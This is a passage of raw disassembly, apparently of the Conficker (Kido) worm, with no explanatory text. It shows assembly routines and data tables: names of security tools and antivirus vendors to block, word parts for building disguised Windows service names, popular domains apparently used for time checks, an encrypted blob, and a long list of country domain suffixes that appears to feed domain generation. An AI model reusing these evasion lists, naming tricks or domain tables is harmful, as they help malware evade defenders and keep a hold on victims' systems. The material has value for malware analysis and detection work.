push [esp+arg_8]
pop edx
push ebx
mov ebx, eax
test ebx, ebx
jz loc_9B05FA
jmp short loc_9B6350
sub_9B6370 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B6388 proc near ; CODE XREF: sub_9B2118-1B7A�p
push dword_9BCB74
pop eax
mov ecx, [eax]
push off_9BAA6D
call dword ptr [ecx+68h]
xor edx, edx
mov dword_9BBD10, edx
mov dword_9BBD14, edx
mov dword_9BBD18, edx
mov dword_9BBD1C, edx
mov dword_9BBD20, edx
mov dword_9BBD24, edx
mov dword_9BBD20, 0Ah
mov dword_9BBD24, 0FFFFFFFFh
retn
sub_9B6388 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B63D8 proc near ; CODE XREF: sub_9ACEE8+2665�p
; FUNCTION CHUNK AT 009AB0C8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009AB2C8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009AB558 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009AB5A4 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 009AB5D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 009AB610 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 009AB6FC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009ABA0C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009ABE10 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009AC5C0 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009AC8EC SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009ACA04 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 009ACB60 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009ACBA0 SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009ACFE0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AD014 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 009AD634 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009AD6E8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009ADC78 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 009ADE94 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009ADF3C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AE2F0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009AE7B0 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 009AE818 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 009AED08 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AED1C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009AF248 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009AF300 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009AF368 SIZE 0000002F BYTES
; FUNCTION CHUNK AT 009AF6C0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009AF90B SIZE 0000002D BYTES
; FUNCTION CHUNK AT 009AF944 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009AF9E0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009AFAB4 SIZE 0000002D BYTES
; FUNCTION CHUNK AT 009AFEF0 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B0304 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009B036C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B1218 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B1278 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B13A8 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009B1850 SIZE 0000003A BYTES
; FUNCTION CHUNK AT 009B1D1C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B1E18 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009B1FF8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B2234 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B2A28 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 009B2CB4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009B2DEC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009B3788 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 009B4088 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009B40F0 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009B41A4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B4668 SIZE 0000003C BYTES
; FUNCTION CHUNK AT 009B4860 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B4A80 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009B4D94 SIZE 0000002F BYTES
; FUNCTION CHUNK AT 009B4EA8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B4EC8 SIZE 000000F4 BYTES
; FUNCTION CHUNK AT 009B54C0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B55C4 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 009B5844 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 009B593C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B5A74 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 009B5B20 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 009B5BA8 SIZE 00000034 BYTES
; FUNCTION CHUNK AT 009B5E4C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B60CC SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009B612C SIZE 00000031 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BAB3E
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
push 2170h
pop eax
sub esp, 8
call __alloca_probe
push dword_9B8788
pop eax
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
mov [ebp-18h], esp
push dword ptr [ebp+8]
pop edi
mov eax, [ebp+0Ch]
mov [ebp-2160h], eax
mov eax, [ebp+10h]
mov [ebp-2158h], eax
mov [ebp-2154h], ecx
mov [ebp-2140h], edx
push dword ptr [ebp+14h]
pop esi
sub ebx, ebx
mov [ebp-2144h], esi
mov [ebp-2134h], ebx
mov dword ptr [ebp-2138h], 0FFFFFFFFh
mov [ebp-4], ebx
mov [esi], ebx
mov [edx], ebx
mov [ecx], ebx
mov [eax], ebx
mov ecx, dword_9BCB74
mov edx, [ecx+10h]
push edi
call dword ptr [edx+1Ch]
mov esi, eax
mov [ebp-2170h], esi
cmp esi, ebx
jz loc_9AF944
jmp off_9BAE41
sub_9B63D8 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B6488: ; CODE XREF: sub_9B3864-4BE�j
mov al, [ebp+var_203D]
test al, al
jnz loc_9AF480
jmp off_9B98A3
; END OF FUNCTION CHUNK FOR sub_9B3864
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B649C proc near ; CODE XREF: sub_9B3FF8-82F5�p
; sub_9B2830+3A�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009AC234 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009AC3B0 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 009ACCD8 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009AE298 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009AE5F0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009AE9DC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009AE9F4 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 009B0D18 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009B0ED0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B183C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B2984 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B3140 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B3194 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B3298 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B4144 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009B5124 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B97BD
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov edi, ecx
mov [ebp+var_18], esp
push edx
pop esi
xor edx, edx
mov [ebp+var_1C], edx
cmp edi, 0Ah
mov [ebp+var_4], edx
jb loc_9ACCD8
jmp off_9B8A06
sub_9B649C endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B64E4: ; CODE XREF: sub_9B1F68-6874�j
mov ecx, esi
call sub_9B31A8
mov dword ptr [edi+ebp-24Ch], 0
push dword ptr [ebp-34h]
pop edi
inc edi
jmp loc_9B01E0
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; =============== S U B R O U T I N E =======================================
sub_9B6504 proc near ; CODE XREF: sub_9B4950+2F�p
; FUNCTION CHUNK AT 009AD4D0 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B1C93 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009B1FE0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009B5F40 SIZE 00000013 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B946A
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-4], 0
call sub_9A4F90
or eax, eax
jz loc_9B1FE5
jmp off_9B8CB9
sub_9B6504 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AB040
loc_9B6548: ; CODE XREF: sub_9AB040+1D�j
; sub_9AB040+15A5�j ...
add eax, 28h
cmp eax, 500h
jb loc_9AB055
jmp loc_9ADFA8
; END OF FUNCTION CHUNK FOR sub_9AB040
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B655C: ; CODE XREF: sub_9B1D80+35E2�j
; DATA XREF: .text:off_9B87DC�o
push dword ptr [ebp-2020h]
pop eax
and eax, eax
jz loc_9AFD2F
jmp loc_9B3070
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION ObtainUserAgentString. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AA BYTES: COLLAPSED FUNCTION __alldiv. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0CCh)
dd 675h dup(0)
dword_9B8000 dd 0 ; DATA XREF: _CRT_INIT(x,x,x)+4F�o
; .text:009C537C�o
dd offset loc_9AA80E
dword_9B8008 dd 6 dup(0) ; DATA XREF: _CRT_INIT(x,x,x)+4A�o
; char *Source
Source dd offset dword_9A13A4 ; DATA XREF: sub_9A387C+56�r
dd offset dword_9A1364+2Ch
dd offset dword_9A1364+14h
dd offset dword_9A1364+8
; char *off_9B8030
off_9B8030 dd offset aAutoruns ; DATA XREF: sub_9A4074+80�r
; "autoruns"
dd offset loc_9A2693+5
dd offset loc_9A2690
dd offset loc_9A2687+1
dd offset loc_9A267F+1
dd offset aGmer ; "gmer"
dd offset aHotfix ; "hotfix"
dd offset byte_9A2668
dd offset aKb958 ; "kb958"
dd offset aKido ; "kido"
dd offset aKlwk ; "klwk"
dd offset aMbsa_ ; "mbsa."
dd offset aMrt_ ; "mrt."
dd offset aMrtstub ; "mrtstub"
dd offset aMs0806 ; "ms08-06"
dd offset aProcexp ; "procexp"
dd offset aProcmon ; "procmon"
dd offset aRegmon ; "regmon"
dd offset aScct_ ; "scct_"
dd offset loc_9A2604
dd offset aTcpview ; "tcpview"
dd offset aUnlocker ; "unlocker"
dd offset aWireshark ; "wireshark"
align 10h
off_9B8090 dd offset aAgnitum ; DATA XREF: sub_9A3FB6:loc_9A3FD3�r
; "agnitum"
dd offset aAhnlab ; "ahnlab"
dd offset aAnti ; "anti-"
dd offset aAntivir ; "antivir"
dd offset aArcabit ; "arcabit"
dd offset aAvast ; "avast"
dd offset aAvgate ; "avgate"
dd offset aAvira ; "avira"
dd offset loc_9A2597+1
dd offset byte_9A258C
dd offset aCcollomb ; "ccollomb"
dd offset aCentralcommand ; "centralcommand"
dd offset aClamav ; "clamav"
dd offset loc_9A2560
dd offset dword_9A254C
dd offset dword_9A2540
dd offset loc_9A2534
dd offset aCyberTa ; "cyber-ta"
dd offset aDefender ; "defender"
dd offset loc_9A2687+1
dd offset loc_9A2514
dd offset aDslreports ; "dslreports"
dd offset aEmsisoft ; "emsisoft"
dd offset aEsafe ; "esafe"
dd offset loc_9A24EB+1
dd offset loc_9A24E4
dd offset loc_9A24DC
dd offset dword_9A24D4
dd offset loc_9A24C7+1
dd offset loc_9A24B6+6
dd offset loc_9A24B3+1
dd offset loc_9A24AC
dd offset aGdata ; "gdata"
dd offset aGrisoft ; "grisoft"
dd offset aHackerwatch ; "hackerwatch"
dd offset loc_9A2480+4
dd offset loc_9A247B+1
dd offset loc_9A2470+4
dd offset loc_9A246A+2
dd offset byte_9A2460
dd offset aKaspersky ; "kaspersky"
dd offset aKido ; "kido"
dd offset aMalware ; "malware"
dd offset aMcafee ; "mcafee"
dd offset byte_9A2438
dd offset aMirage ; "mirage"
dd offset dword_9A2414+10h
dd offset dword_9A2414+8
dd offset dword_9A2414
dd offset dword_9A2400
dd offset aNod32 ; "nod32"
dd offset byte_9A23F0
dd offset aNorton ; "norton"
dd offset aOnecare ; "onecare"
dd offset loc_9A23D8
dd offset byte_9A23D0
dd offset aPrevx ; "prevx"
dd offset aPtsecurity ; "ptsecurity"
dd offset loc_9A23AF+1
dd offset loc_9A23A8
dd offset loc_9A239D+3
dd offset loc_9A2394+4
dd offset loc_9A238A+2
dd offset loc_9A237C
dd offset loc_9A2370
dd offset loc_9A2366+2
dd offset loc_9A235B+1
dd offset loc_9A234E+6
dd offset loc_9A234C
dd offset loc_9A233C+4
dd offset loc_9A2337+1
dd offset loc_9A2330
dd offset loc_9A231F+1
dd offset dword_9A2310+4
dd offset loc_9A230B+1
dd offset loc_9A2303+1
dd offset loc_9A22FC
dd offset loc_9A22EC
dd offset dword_9A22D4+8
off_9B81CC dd offset dword_9A22D4 ; DATA XREF: sub_9A3FB6:loc_9A4001�r
dd offset loc_9A22CA+2
dd offset loc_9A22C4
dd offset loc_9A22BF+1
dd offset loc_9A22B8
dd offset loc_9A22AD+3
dd offset byte_9A22A8
dd offset dword_9A22A0
dd offset loc_9A2298
dd offset loc_9A228F+1
dd offset loc_9A2287+1
dd offset byte_9A2280
dd offset dword_9A2268+10h
dd offset dword_9A2268+8
align 8
; wchar_t *off_9B8208
off_9B8208 dd offset aApp ; DATA XREF: sub_9A7641+2C5�r
; "App"
dd offset aAudio ; "Audio"
dd offset aDm ; "DM"
dd offset aEr ; "ER"
dd offset aEvent ; "Event"
dd offset aHelp ; "help"
dd offset aIas ; "Ias"
dd offset aIr ; "Ir"
dd offset aLanman ; "Lanman"
dd offset aNet ; "Net"
dd offset aNtms ; "Ntms"
dd offset aRas ; "Ras"
dd offset aRemote ; "Remote"
dd offset aSec ; "Sec"
dd offset aSr ; "SR"
dd offset aTapi ; "Tapi"
dd offset aTrk ; "Trk"
dd offset aW32 ; "W32"
dd offset aWin ; "win"
dd offset aWmdm ; "Wmdm"
dd offset aWmi ; "Wmi"
dd offset aWsc ; "wsc"
dd offset aWuau ; "wuau"
dd offset aXml ; "xml"
; wchar_t *off_9B8268
off_9B8268 dd offset aAccess ; DATA XREF: sub_9A7641+2E1�r
; "access"
dd offset aAgent ; "agent"
dd offset aAuto ; "auto"
dd offset aLogon_0 ; "logon"
dd offset aMan ; "man"
dd offset aMgmt ; "mgmt"
dd offset aMon ; "mon"
dd offset aProv ; "prov"
dd offset aServ_0 ; "serv"
dd offset aServer ; "Server"
dd offset aService ; "Service"
dd offset aSrv_0 ; "Srv"
dd offset aSrv ; "srv"
dd offset aSvc_0 ; "Svc"
dd offset aSvc ; "svc"
dd offset aSystem ; "System"
dd offset aTime_0 ; "Time"
align 10h
; wchar_t *off_9B82B0
off_9B82B0 dd offset aBoot ; DATA XREF: sub_9A7E0F+DF�r
; sub_9A7E0F+107�r
; "Boot"
dd offset aCenter ; "Center"
dd offset aConfig ; "Config"
dd offset aDriver ; "Driver"
dd offset aHelper ; "Helper"
dd offset aImage ; "Image"
dd offset aInstaller ; "Installer"
dd offset aManager ; "Manager"
dd offset aMicrosoft ; "Microsoft"
dd offset aMonitor ; "Monitor"
dd offset aNetwork ; "Network"
dd offset aSecurity ; "Security"
dd offset aServer ; "Server"
dd offset aShell ; "Shell"
dd offset aSupport ; "Support"
dd offset aSystem ; "System"
dd offset aTask ; "Task"
dd offset aTime_0 ; "Time"
dd offset aUniversal ; "Universal"
dd offset aUpdate ; "Update"
dd offset aWindows ; "Windows"
dd offset aHardware ; "Hardware"
dd offset aControl ; "Control"
dd offset aAudit ; "Audit"
dd offset aEvent ; "Event"
dd offset aNotify ; "Notify"
dd offset aBackup ; "Backup"
dd offset aTrusted ; "Trusted"
dd offset aComponent ; "Component"
dd offset aFramework ; "Framework"
dd offset aManagement ; "Management"
dd offset aBrowser ; "Browser"
dd offset aMachine_0 ; "Machine"
dd offset aLogon ; "Logon"
dd offset aPower ; "Power"
dd offset aStorage ; "Storage"
dd offset aDiscovery ; "Discovery"
dd offset aPolicy ; "Policy"
; int dword_9B8348
dword_9B8348 dd 0C353h ; DATA XREF: sub_9A8133+1F�r
align 10h
dword_9B8350 dd 19A4E513h, 334658ADh, 0C1FE1E10h, 0B14F96A1h, 49E1FB18h
; DATA XREF: sub_9A8133+25�o
dd 179C3220h, 0BC7C1CE8h, 0C931816Dh, 0BC7D8DDBh, 0E494BBA1h
dd 307D0421h, 8C67F9AAh, 4741A678h, 0B95708CAh, 2BA90052h
dd 0FCD778E0h, 7CFB575Ah, 0E216D0D9h, 0F6DE2C2Eh, 439484DBh
dd 1C72EEE7h, 95817E86h, 0BB39CE59h, 81A020A2h, 3D090363h
dd 0EE5FEF9Ch, 56D98B03h, 0FAC4A821h, 2069B1B5h, 1CB53074h
dd 780483EAh, 1CAC7850h, 2B5D548Ch, 0BD7592E3h, 0EB5E78D9h
dd 0A69B4321h, 6BD48916h, 6A0D0F0Bh, 19F84715h, 2C624150h
dd 569AD89Eh, 0C47A413Bh, 0FBAF445Ah, 1CF97DD6h, 0F5A346C0h
dd 0D6BA4981h, 93A806E1h, 8387E7F6h, 0BCC0E862h, 697A182Dh
dd 19F51A1Eh, 7ACEB95Ah, 3AA0DC34h, 126BEE2Eh, 2E2DF0B2h
dd 2D5F6D87h, 0F0BC97F5h, 0C5301A53h, 0A2A4C56Dh, 0AD88BE28h
dd 6E0679E1h, 36F3903Ch, 5F82FF9h, 0C3EA5B3Bh, 67E501D3h
dd 7E284C6Ch, 6ECDB335h, 20D3D333h, 30CF092Eh, 3414A79h
dd 921D7662h, 8834A4B2h, 55144409h, 0F0EFE814h, 0E082CBFCh
dd 36425004h, 92B83DDCh, 5A13ABE9h, 0A4070E7Bh, 1C6971EBh
dd 5E0EA903h, 0D4574329h, 0BD71E0A8h, 0CC736E47h, 81630B82h
dd 5EAC6F89h, 0E23F1659h, 0BDA4DCD2h, 0AEA77F7h, 4D6FCCF3h
dd 947CDB51h, 1B5E577Dh, 0E118A2A6h, 20E2B6C5h, 4F116C8Eh
dd 56F61EC9h, 62568F93h, 1F8611A0h, 0D72D1D1Dh, 3130E12Ah
dd 0BFA81C30h, 900E0D28h, 0B7542DDAh, 44038Ch, 0C2AB5B7Dh
dd 0E034515Fh, 0ED2DBFA5h, 0BBD428C3h, 5EF2B559h, 9A5B5AFDh
dd 0B46239E9h, 9354E99h, 81B1A2E2h, 0DB4B2F2Bh, 2262763Eh
dd 5B79FD52h, 3C70536Eh, 0AB4D9EBEh, 629ED354h, 607A59FFh
dd 1E4878FCh, 1CCB2F05h, 91235FF9h, 0E2427EFEh, 33D3B088h
dd 72004187h, 2263944Fh, 20A2B967h
off_9B8550 dd offset aBaidu_com ; DATA XREF: sub_9A83C7+2C�r
; "baidu.com"
dd offset aGoogle_com ; "google.com"
dd offset aYahoo_com ; "yahoo.com"
dd offset aAsk_com ; "ask.com"
dd offset aW3_org ; "w3.org"
dd offset aFacebook_com ; "facebook.com"
dd offset aImageshack_us ; "imageshack.us"
dd offset aRapidshare_com ; "rapidshare.com"
; char *off_9B8570
off_9B8570 dd offset aJan ; DATA XREF: sub_9A82C5+A2�r
; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
; char *off_9B85A0
off_9B85A0 dd offset aAc ; DATA XREF: sub_9A857A+11F�r
; "ac"
dd offset aAe ; "ae"
dd offset aAg ; "ag"
dd offset aAm ; "am"
dd offset aAs ; "as"
dd offset aAt ; "at"
dd offset aBe ; "be"
dd offset aBo ; "bo"
dd offset aBz ; "bz"
dd offset aCa ; "ca"
dd offset aCd ; "cd"
dd offset aCh ; "ch"
dd offset aCl ; "cl"
dd offset aCn ; "cn"
dd offset aCo_cr ; "co.cr"
dd offset aCo_id ; "co.id"
dd offset aCo_il ; "co.il"
dd offset aCo_ke ; "co.ke"
dd offset aCo_kr ; "co.kr"
dd offset aCo_nz ; "co.nz"
dd offset aCo_ug ; "co.ug"
dd offset aCo_uk ; "co.uk"
dd offset aCo_vi ; "co.vi"
dd offset aCo_za ; "co.za"
dd offset aCom_ag ; "com.ag"
dd offset aCom_ai ; "com.ai"
dd offset aCom_ar ; "com.ar"
dd offset aCom_bo ; "com.bo"
dd offset aCom_br ; "com.br"
dd offset aCom_bs ; "com.bs"
dd offset aCom_co ; "com.co"
dd offset aCom_do ; "com.do"
dd offset aCom_fj ; "com.fj"
dd offset aCom_gh ; "com.gh"
dd offset aCom_gl ; "com.gl"
dd offset aCom_gt ; "com.gt"
dd offset aCom_hn ; "com.hn"
dd offset aCom_jm ; "com.jm"
dd offset aCom_ki ; "com.ki"
dd offset aCom_lc ; "com.lc"
dd offset aCom_mt ; "com.mt"
dd offset aCom_mx ; "com.mx"
dd offset aCom_ng ; "com.ng"
dd offset aCom_ni ; "com.ni"
dd offset aCom_pa ; "com.pa"
dd offset aCom_pe ; "com.pe"
dd offset aCom_pr ; "com.pr"
dd offset aCom_pt ; "com.pt"
dd offset aCom_py ; "com.py"
dd offset aCom_sv ; "com.sv"
dd offset aCom_tr ; "com.tr"
dd offset aCom_tt ; "com.tt"
dd offset aCom_tw ; "com.tw"
dd offset aCom_ua ; "com.ua"
dd offset aCom_uy ; "com.uy"
dd offset aCom_ve ; "com.ve"
dd offset aCx ; "cx"
dd offset aCz ; "cz"
dd offset aDj ; "dj"
dd offset aDk ; "dk"
dd offset aDm_0 ; "dm"
dd offset aEc ; "ec"
dd offset aEs ; "es"
dd offset aFm ; "fm"
dd offset aFr ; "fr"
dd offset aGd ; "gd"
dd offset aGr ; "gr"
dd offset aGs ; "gs"
dd offset aGy ; "gy"
dd offset aHk ; "hk"
dd offset aHn ; "hn"
dd offset aHt ; "ht"
dd offset aHu ; "hu"
dd offset aIe ; "ie"
dd offset aIm ; "im"
dd offset aIn ; "in"
dd offset aIr_0 ; "ir"
dd offset aIs ; "is"
dd offset aKn ; "kn"
dd offset aKz ; "kz"
dd offset aLa ; "la"
dd offset aLc ; "lc"
dd offset aLi ; "li"
dd offset aLu ; "lu"
dd offset aLv ; "lv"
dd offset aLy ; "ly"
dd offset aMd ; "md"
dd offset aMe ; "me"
dd offset aMn ; "mn"
dd offset aMs ; "ms"
dd offset aMu ; "mu"
dd offset aMw ; "mw"
dd offset aMy ; "my"
dd offset aNf ; "nf"
dd offset aNl ; "nl"
dd offset aNo ; "no"
dd offset aPe ; "pe"
dd offset aPk ; "pk"
dd offset aPl ; "pl"
dd offset aPs ; "ps"
dd offset aRo ; "ro"
dd offset aRu ; "ru"
dd offset aSc ; "sc"
dd offset aSg ; "sg"
dd offset aSh ; "sh"
dd offset aSk ; "sk"
dd offset aSu ; "su"
dd offset aTc ; "tc"
dd offset aTj ; "tj"
dd offset aTl ; "tl"
dd offset aTn ; "tn"
dd offset aTo ; "to"
dd offset aTw ; "tw"
dd offset aUs ; "us"
dd offset aVc ; "vc"
dd offset aVn ; "vn"
dbl_9B8770 db 56h, 48h, 85h, 56h, 77h, 0, 0, 0 ; DATA XREF: sub_9A83C7+CF�w
; sub_9A84A9+C�r ...
dword_9B8778 dd 1 ; DATA XREF: sub_9A9FE6+24A�o
; sub_9A9FE6+27F�r
dd 2 dup(0)
dd 13C9E684h
dword_9B8788 dd 0E8A4E7Ah ; DATA XREF: sub_9A3620+9�r
; sub_9A3715+E�r ...
dword_9B878C dd 19930520h, 4 dup(0) ; DATA XREF: .text:009AA98F�o
; __NLG_Notify+2�o
off_9B87A0 dd offset aInitializecrit ; DATA XREF: sub_9B0930:loc_9AC080�r
; "InitializeCriticalSection"
off_9B87A4 dd offset loc_9ADD8C ; DATA XREF: sub_9B1A08-2B09�r
off_9B87A8 dd offset dword_9BA8D4 ; DATA XREF: sub_9AE860+5�r
off_9B87AC dd offset loc_9AD0F8 ; DATA XREF: sub_9AC32C+4D�r
off_9B87B0 dd offset loc_9B07B8 ; DATA XREF: sub_9AEE5C-E5B�r
dword_9B87B4 dd 6C74656Eh, 632E676Fh ; DATA XREF: .text:009B9BFC�o
db 6Fh, 6Dh, 0
off_9B87BF dd offset loc_9ADF50 ; DATA XREF: sub_9B3EFC-5495�r
off_9B87C3 dd offset dword_9BBF74 ; DATA XREF: sub_9B3C6C+29�r
align 4
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: .text:off_9B93D7�o
off_9B87D8 dd offset aWritefile ; DATA XREF: sub_9B0930:loc_9B1EF0�r
; "WriteFile"
off_9B87DC dd offset loc_9B655C ; DATA XREF: sub_9B1D80+35E2�r
dword_9B87E0 dd 0FFFFFFFFh, 9B0284h, 9B48F4h, 646E6179h, 722E7865h
; DATA XREF: .text:off_9B8870�o
; .text:009B9CC8�o
db 75h, 0
off_9B87F6 dd offset loc_9B61C0 ; DATA XREF: sub_9B1F68+3923�r
align 4
dword_9B87FC dd 6F64657Ah, 6D6F632Eh, 0 ; DATA XREF: .text:009B9CD4�o
dword_9B8808 dd 0FFFFFFFFh, 9B4D54h, 9B0A24h ; DATA XREF: .text:off_9BABEB�o
dword_9B8814 dd 0FFFFFFFFh, 9AB76Ch, 9AE3D0h ; DATA XREF: .text:off_9BA154�o
off_9B8820 dd offset sub_9B1F68 ; DATA XREF: sub_9B4950+47�r
; sub_9B4950+68�r
off_9B8824 dd offset loc_9B31F4 ; DATA XREF: sub_9B0930-1234�r
aRegistration db 'registration',0 ; DATA XREF: .text:009BA2E4�o
align 4
aWaitforsingleo db 'WaitForSingleObject',0 ; DATA XREF: .text:off_9BA421�o
off_9B884C dd offset aGetfileversion ; DATA XREF: sub_9B0930:loc_9B3078�r
; "GetFileVersionInfoSizeA"
aDoubleclick_co db 'doubleclick.com',0 ; DATA XREF: .text:009B9B20�o
aSocket db 'socket',0 ; DATA XREF: .text:off_9B977D�o
align 4
a2ch_net db '2ch.net',0 ; DATA XREF: .text:off_9B9A94�o
off_9B8870 dd offset dword_9B87E0 ; DATA XREF: sub_9B2830+5�r
a21022 db '21022',0 ; DATA XREF: .text:009BA818�o
off_9B887A dd offset loc_9B2654 ; DATA XREF: sub_9AF654+114A�r
align 10h
dword_9B8880 dd 2D72662Ch, 713B5246h, 352E303Dh, 0 ; DATA XREF: .text:009BA49C�o
dword_9B8890 dd 0FFFFFFFFh, 9B2714h, 9B1310h, 6B726F57h ; DATA XREF: .text:off_9B96BB�o
; .text:009BA338�o
db 73h, 0
off_9B88A2 dd offset loc_9AFD68 ; DATA XREF: sub_9B1F68+22F4�r
off_9B88A6 dd offset loc_9B1F30 ; DATA XREF: sub_9B0930-4378�r
align 4
dword_9B88AC dd 656C6C61h, 2E6F7267h ; DATA XREF: .text:009B9AB8�o
db 70h, 6Ch, 0
off_9B88B7 dd offset loc_9ACFFC ; DATA XREF: sub_9B04A8+3E9B�r
align 4
dword_9B88BC dd 0FFFFFFFFh, 9ADE08h, 9B33D8h ; DATA XREF: .text:off_9BA992�o
off_9B88C8 dd offset loc_9B0AB0 ; DATA XREF: sub_9B5480+39�r
off_9B88CC dd offset aObtainuseragen ; DATA XREF: sub_9B0930:loc_9AFC00�r
; "ObtainUserAgentString"
off_9B88D0 dd offset loc_9B0C0C ; DATA XREF: sub_9B0930-2FBC�r
dword_9B88D4 dd 2E356968h, 6D6F63h, 6E656741h, 74h ; DATA XREF: .text:009B9B74�o
; .text:009BA1D8�o
dword_9B88E4 dd 0FFFFFFFFh, 9AE204h, 9B26DCh ; DATA XREF: .text:off_9BA6CC�o
off_9B88F0 dd offset dword_9BA8F8 ; DATA XREF: sub_9B63D8-14B3�r
dd offset dword_9BA8F8
dd offset aApplicationXSh ; ", application/x-shockwave-flash"
off_9B88FC dd offset dword_9BF380 ; DATA XREF: sub_9ADCEC+44�r
